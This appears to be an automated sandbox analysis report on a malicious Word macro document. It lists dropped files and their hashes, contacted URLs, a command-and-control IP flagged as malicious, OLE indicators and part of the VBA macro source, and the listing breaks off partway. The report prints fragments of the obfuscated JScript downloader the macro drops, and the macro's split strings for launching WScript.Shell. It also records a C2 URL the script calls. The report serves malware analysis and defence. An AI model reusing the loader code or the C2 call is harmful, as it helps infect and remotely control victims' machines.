MD5:	481D2AB88A6935F1FEC7DE625B2ED08E
SHA1:	9CD3A3C562B5E7C917DAEC57CC68790F0093E5F6
SHA-256:	795A2CC6A2722D186C2E4A81339CD45BD00E33D289A65AEEED2C86728DEF290D
SHA-512:	252EC7DBA305563D6DD2E5C2808BBF1E5B56330B6C637D7231996ED5666124CA4D2EBEB75AC3338B370D741810C90EAD501130D56681E50D87D7DFD1689AABE6
Malicious:	false
Reputation:	low
Preview:	......k...........................................................................MS Shell Dlg........0sEn............-........................................"System..............0sEn....%.......-.......'.........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\ED28B24D.wmf Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Size (bytes):	232
Entropy (8bit):	3.410034309126555
Encrypted:	false
MD5:	9646D400EF87E4311FFE7BC7A483FC62
SHA1:	A6BBCC153A9BE7DB3D36B859C7F8788BE7CF159D
SHA-256:	5F6C5D9C7CDB1CD65E3509DDBB5DE29C47728EE5E363FF740B892E329B1E2618
SHA-512:	BD1B81D4A7ADF0A0F0DD210FECDD19C5C9605A37F4AE22CFE6D022CC14FDCD9B0E5B908B6BE3EFFDF4869A317ADEBEA0E5478940C7145585BC6C2323E6A53E54
Malicious:	false
Reputation:	low
Preview:	..................................................................................MS Shell Dlg......fi..fi............-........................................"System..".........fi..fi"...........-.......'...............k...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{109B690E-C8F2-494B-8230-D224AEEA1832}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{586CADFE-08B0-4A8B-89A3-824176CBB086}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	1536
Entropy (8bit):	1.6881888670117746
Encrypted:	false
MD5:	A784A8D008B955BB4506871B21EC49E4
SHA1:	49D043AC51CF7ECA64ED76DE38B7D870882A8ADB
SHA-256:	2EACFCD17A6994E173DCD1B177DEE9E79E6D37C7A7B2FB939E6E8FE545322D9C
SHA-512:	86CA3A9D74DC25D13DE2D9E9C925B24D4057A1CF897B5EF539C84E5F6564C372142DBE9A1050CCAF5052AB7CCD6FFA48A1A35B2EDC90286DB55695FCCEF08401
Malicious:	false
Reputation:	low
Preview:	..1.2...1.2...1...1...1.2...1.2...1.2...1.2...(...(...(...(...(...P.r.i.n.c.e. .K.e.v.i.n...P.K............................................................................................................................................................................................................................................................................................................................................................................................................................................................."...(.......2...6...:...>...B...\...b.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Word8.0\MSTSCLib.exd Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	176140
Entropy (8bit):	4.198548795292308
Encrypted:	false
MD5:	E070DEBF7E914FA19706B63F68B347B5
SHA1:	D45F6F64650F77B8862BBC7DD67444BAC217B891
SHA-256:	6932BAAE19EA815761E8071CF746FF843E03623A56B988A8F1B7AB2ED82498D9
SHA-512:	A74B06D849D062B91D617B1F840B8A46358FCB5D40C3B854DDC1F86D603D604D1618FE7D9EC1D90ADB30BEEEE93C8724BADB9612184E69F2CE8E91D9A52EA677
Malicious:	false
Reputation:	low
Preview:	MSFT................A...........j...................H-.............. ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...).......6..h)..............`...........H...8................................................................................O......................................................................................................................$!...................6.."...0....................P..................................................&!..................................................0............................................... !....................P.........(g..@a...a..........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1072749549_VIRUS0045310798.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	MS Windows shortcut
Size (bytes):	1204
Entropy (8bit):	4.665836701884121
Encrypted:	false
MD5:	C2527A04F7BD6A28E30C79A869B5B6B1
SHA1:	336D2A5CB4555B9833D3EA28C0E7D146214A718B
SHA-256:	B5DB1168D422623DB5776869368F8ABF91DBAC6B6B74E0AC9258D7727692D223
SHA-512:	C2D50D44560B6968CB3E91661DDDBEED362F217BDF4DFABC82AB4F4E8452AF7C1F7735CD0011C9D9EF1DC64BD43F9D2C0CE42AFCEAF72BF93B363D94EDCADE72
Malicious:	false
Reputation:	low
Preview:	L..................F.... .....wJ.....&e+M... .^'M...............................2.....9P.8 .107274~1.DOC..n........N..9P.8..............................1.0.7.2.7.4.9.5.4.9._.V.I.R.U.S.0.0.4.5.3.1.0.7.9.8...d.o.c.......k...............-.......j...........m..Z.....C:\Users\user\Desktop\1072749549_VIRUS0045310798.doc..5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.0.7.2.7.4.9.5.4.9._.V.I.R.U.S.0.0.4.5.3.1.0.7.9.8...d.o.c.`.......X.......376483..............x..C..Z..;.....M.}.........?....x..C..Z..;.....M.}.........?E.......9...1SPS..mD..pH.H@..=x.....h....H....X/:......`"................L..................F.... .....wJ.....&e+M... .^'M...............................2.....9P.8 .107274~1.DOC..n........N..9P.8..............................1.0.7.2.7.4.9.5.4.9._.V.I.R.U.S.0.0.4.5.3.1.0.7.9.8...d.o.c.......k...............-.......j...........m..Z.....C:\Users\user\Desktop\1072749549_VIRUS0045310798.doc..5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.0.7.2.7.4.9.5.4.9._.V.I

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	116
Entropy (8bit):	4.487303495464757
Encrypted:	false
MD5:	184DE5382AFB6427224F73437DB661EA
SHA1:	3AE71C70B75E5C95A8F7C3928AC65A12C48A419B
SHA-256:	45FA7B27D2E40CCC39611283DA67CDE3DBB774B35875D961529050F9818CBDDE
SHA-512:	CD737823BBB88900EA41F792216FC60439EEF31A087C56625805A8D48C5FB9FE56FDB17907D62C97A0D6FDDC50235BBCCC13E11BBAEF05D5D135CDFC719192C9
Malicious:	false
Reputation:	low
Preview:	[doc]..1072749549_VIRUS0045310798.LNK=0..1072749549_VIRUS0045310798.LNK=0..[doc]..1072749549_VIRUS0045310798.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	3.5478252832794896
Encrypted:	false
MD5:	200D6B88897307DDAC2AB9421E8FAF0D
SHA1:	4314ED8D197D8B822FA1F7C78E259D3C58D8BDF3
SHA-256:	B86F24C7863149813EFCCE22F648B0C8397D780DF2B5FFC1C7119EA7E8BB88A1
SHA-512:	8CB5003273EB634A857F03122E8D8AE8D562E727E7B84BC6336C99A5E20652112FB7DF16BDB7C71E8AE00CF16FD2DAA720319B94BBE4C2FC31F9F4F9D5CE51F5
Malicious:	false
Reputation:	low
Preview:	.user...........................................P.r.i.n.c.e. .K.e.v.i.n......k.................I......X..............._............hc".........X%k.5V.....

C:\Users\user\AppData\Roaming\Microsoft\Word\fuc.rrr Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	302416
Entropy (8bit):	5.418539265762386
Encrypted:	false
MD5:	1DAFE9601209158E4E191D188FEBF9E6
SHA1:	0506FF2B4A95AB632B93B396AE32E5B840D8DADE
SHA-256:	95031D442B7FCA0C1BC922F6022AFEEDC4CAA76F6FEC9DA96817FB1074181FD2
SHA-512:	5C84D730B100110F45DB95A58651B4C5C4E6C8B4A74FE3E4DB74EFD0F462BD5B3B93AD53F0E909AC6A32AA09E35734C8A5C4D70A01685D31E6A06B00F49318BA
Malicious:	false
Reputation:	low
Preview:	Etilqborne14ko='fucking82';Etilqwerewritten90ko='injuice.42';Etilqsharp51ko='beggin.67';Etilqtemperat86ko='that5';EtilqBeth75ko='Menace84';Etilqhairwas54ko='Hailie22';Etilqwith10ko='daughter87';Etilqyoullgrow71ko='hairs89';Etilqchildren35ko='back4';Etilqbooks55ko='nice36';Etilqbookworm45ko='boys60';EtilqBethI35ko='cause64';Etilqfiercefunny34ko='outfit28';Etilqsock11ko='woman13';Etilqvillain77ko='fucking82';Etilqwerewritten90ko='injuice42';Etilqsharp51ko='beggin67'; try{ bpwmb(true); }catch(v){ this['Kedazx']=((v+''))['len'+'gth']-20; Lolpy8='h'; this['Doil99']=2100; }; Frvbo9='slice'; Rfolert=(Lolpy8+'String')[Frvbo9](this['Kedazx']); this['Kedazx']=[]; Frvbo9=''; var jxvvpooTrf=function(){return Doil99*0;}; function jxvvpoo(nksufight,wiffbr) {try{ njnduri_5(nksufight); }catch(v){ if ( wiffbr!=76 ) {return true;} else {return this[Rfolert][[Frvbo9='fromC'+Lolpy8+'a'+'rCode']](nksufight); } return false; }};Etilqkeeping94ko=0.66;EtilqBeth75ko=0.362;Etilqhairwas54ko=0.591;Etilqwit

C:\Users\user\Desktop\~$72749549_VIRUS0045310798.doc Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.152932206977453
Encrypted:	false
MD5:	A2D0A0DF54BBB241B362700BF62A985E
SHA1:	018A682E3F2163464920832886F653EA15B149D9
SHA-256:	6D108F9924FE5A83EBC3320BFA0117850E6E9E7E613CAA7D2689E79C90312573
SHA-512:	F6D5355879483FCAFB41240E190698D458617EE39366295CF4E1CB70E1D409550DD1C8031D67CC7DCB5934914583E3405D1604E21A43462FADDCEC21FC9B413E
Malicious:	false
Reputation:	low
Preview:	.user...........................................P.r.i.n.c.e. .K.e.v.i.n.......................I.....................................b".... .....b"........

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://login.microsoftonline.com/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://shell.suite.office.com:1443	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://cdn.entity.	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://wus2-000.contentsync.	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://powerlift.acompli.net	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://lookup.onenote.com/lookup/geolocation/v1	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://185.216.3WLf	wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	false		low
https://api.powerbi.com/v1.0/myorg/imports	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://api.aadrm.com/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748SJ	wscript.exe, 00000006.00000002.665229925.0000000002E38000.00000004.00000020.sdmp	false		unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://api.microsoftstream.com/api/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://cr.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://graph.ppe.windows.net	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://powerlift-frontdesk.acompli.net	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://tasks.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://officeci.azurewebsites.net/api/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://store.office.cn/addinstemplate	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://wus2-000.pagecontentsync.	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
http://185.216.35.24/	wscript.exe, 00000006.00000002.665229925.0000000002E38000.00000004.00000020.sdmp	false		unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://globaldisco.crm.dynamics.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://store.officeppe.com/addinstemplate	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://dev0-api.acompli.net/autodetect	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://www.odwebp.svc.ms	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://api.powerbi.com/v1.0/myorg/groups	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://web.microsoftstream.com/video/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://graph.windows.net	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://dataservice.o365filtering.com/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://officesetup.getmicrosoftkey.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://analysis.windows.net/powerbi/api	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://outlook.office365.com/autodiscover/autodiscover.json	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://weather.service.msn.com/data.aspx	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://apis.live.net/v5.0/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false	URL Reputation: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://management.azure.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748%	wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	false		unknown
https://incidents.diagnostics.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://185.216.3?	wscript.exe, 00000006.00000002.667005047.00000000052CB000.00000004.00000001.sdmp	false		low
https://incidents.diagnosticssdf.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://clients.config.office.net/user/v1.0/android/policies	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://entitlement.diagnostics.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748	wscript.exe, 00000006.00000002.665229925.0000000002E38000.00000004.00000020.sdmp	false		unknown
https://templatelogging.office.com/client/log	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://management.azure.com/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://ncus-000.contentsync.	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://login.windows.net/common/oauth2/authorize	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://graph.windows.net/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://devnull.onenote.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://messaging.office.com/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://o365diagnosticsppe-web.cloudapp.net	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://skyapi.live.net/Activity/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://clients.config.office.net/user/v1.0/mac	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://dataservice.o365filtering.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://onedrive.live.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://185.216.35.24/V	wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	false		unknown
https://ovisualuiapp.azurewebsites.net/pbiagave/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://directory.services.	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false	URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://loki.delve.office.com/api/v1/configuration/officewin32/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://onedrive.live.com/embed?	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://augloop.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=14126220	wscript.exe, 00000006.00000002.667790424.0000000005DE3000.00000004.00000040.sdmp	false		unknown
https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://clients.config.office.net/	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://api.diagnostics.office.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high
https://settings.outlook.com	BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
185.216.35.24	United Kingdom		9009	unknown	true

Static File Info

General
File type:	CDF V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 20 09:15:00 2020, Last Saved Time/Date: Mon Jan 20 09:17:00 2020, Number of Pages: 41, Number of Words: 45141, Number of Characters: 257308, Security: 0
Entropy (8bit):	7.352802722960944
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	1072749549_VIRUS0045310798.doc
File size:	657408
MD5:	9e3734f451f108fcd71984a32f96154a
SHA1:	057fae9046753256002dbbf034e324aa77646b68
SHA256:	f347724757f0f1f4f8984aaa1e42cecd236e6fda8ae0d5b9d10fcdb2d0321219
SHA512:	79cd3a65d5cba111ea1d45c9b293dec00ad4139950db2d22c57f20914d6b95f831b218e1793d0823c03564b902a0875f024b21abb7d49247ec3c9feaa48f5b6b
SSDEEP:	6144:aFRwwKbGIH5JQZ3JlNPqTz3zcigQT783N6wb/AcgdAeZIsejgf+uVdzNxGawmf:RZwJWf3F3v896IdIeEfnjxG
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "1072749549_VIRUS0045310798.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	0
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	Windows User
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Windows User
Revion Number:	3
Total Edit Time:	60
Create Time:	2020-01-21 09:15:00
Last Saved Time:	2020-01-21 09:17:00
Number of Pages:	41
Number of Words:	45141
Number of Characters:	257308
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	2144
Number of Paragraphs:	603
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040
Language:	in61915560

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 8593

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	8593
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # v \| . . # . B . . . . . . S . . M . . . v . G . . . . l r . ; . . . . . . . . . . . . . . . . . . . . s ! . R + . 4 J . j j N . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 00 01 00 00 04 0b 00 00 e4 00 00 00 ea 01 00 00 ff ff ff ff 0b 0b 00 00 f3 19 00 00 00 00 00 00 01 00 00 00 3e fe 0f 80 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 23 76 7c f6 01 23 b3 42 b2 97 b4 f2 b3 a0 53 02 0d 4d 8c d3 00 76 c3 47 b9 bf cb 96 6c 72 b0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
texto")
Binary
edad"
ciudad
Byte,
Byte)
hacia
Public
Object
CreateObject(yu)
Replace(Fokrtf,
"se")
estructura
parmetros
MAYOR
multiplica
DatosPersonales("Eva",
CreateObject(tg)
"fuc"
multiplicar
Dceas(tg
contenidos
DatosPersonales(nombre
False
ActiveDocument.Content.Text
Ejemplo
'Ejercicios
boolean
funcin
dependiendo
parametros
UsarProcedimiento()
String,
String)
Nberft
hipervinculo
CallByName
bandera
numricos
Unit:=wdWord,
"Granada"
Selection.Extend
String
DatosPersonales
Inserta
Empty
"docx",
selecciona
ayuntamiento
Kerdobe(sa
ActiveDocument.Hyperlinks.Add
"WSc"
Close
bandera,
Application.StartupPath,
"ThisDocument"
"\..\"
Nberft),
Resume
Dceas
cadena
Fokrtf
VB_Base
VbMethod,
VB_PredeclaredId
control
#Nived
MostrarMensaje(bandera
Selection.PasteAndFormat
VB_Creatable
ActiveDocument.Close
VB_Exposed
procedimiento
palabra
Desazo
Selection.EscapeKey
Integer,
ScreenTip:="",
".rrr"
"ell"
condicin,
Integer
Selection.Cut
SubAddress:="",
(wdFormatOriginalFormatting)
recibe
"ript."
".rrr",
Kerdobe
Error
FreeFile
'Crea
Variant,
"Granada")
"Eva",
Attribute
utilizando
MENOR
VB_GlobalNameSpace
MsgBox
"Eres
VB_TemplateDerived
Multiplicar
"Esto
#Nived,
VB_Name
Write
Anchor:=Selection.Range,
cvcv:
Dceas(bandera,
Function
TextToDisplay:=
Muestra
utiliza
derecha
Fvo_t()
VB_Customizable
nombre
MostrarMensaje(True,
Macro
Selection.MoveLeft
parmetro
'Tecla
Selection.MoveRight
MostrarMensaje
Vertopd
Address:=
resultado
Bedcoll
Traspone
MayorEdad(edad
Hipervinculo
Sace_t()
Private
dentro
Nived
mensaje

VBA Code

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True





Public Fokrtf As String

Public Nberft As String

Public Desazo As String

Public Vertopd As String

Public Ubedf7 As String





Sub Fvo_t()

'

' Hipervinculo Macro

'   Inserta un hipervinculo a la web del ayuntamiento

'

'

    ActiveDocument.Hyperlinks.Add Anchor:=Selection.Range, Address:=         "docx", SubAddress:="", ScreenTip:="", TextToDisplay:=         "ux"

End Sub



Sub Sace_t()

'

'       Traspone una palabra hacia la derecha

'

        'Tecla F8 selecciona una palabra

        Selection.Extend

        Selection.Extend

        Selection.EscapeKey

        Selection.Cut

        Selection.MoveRight Unit:=wdWord, Count:=1

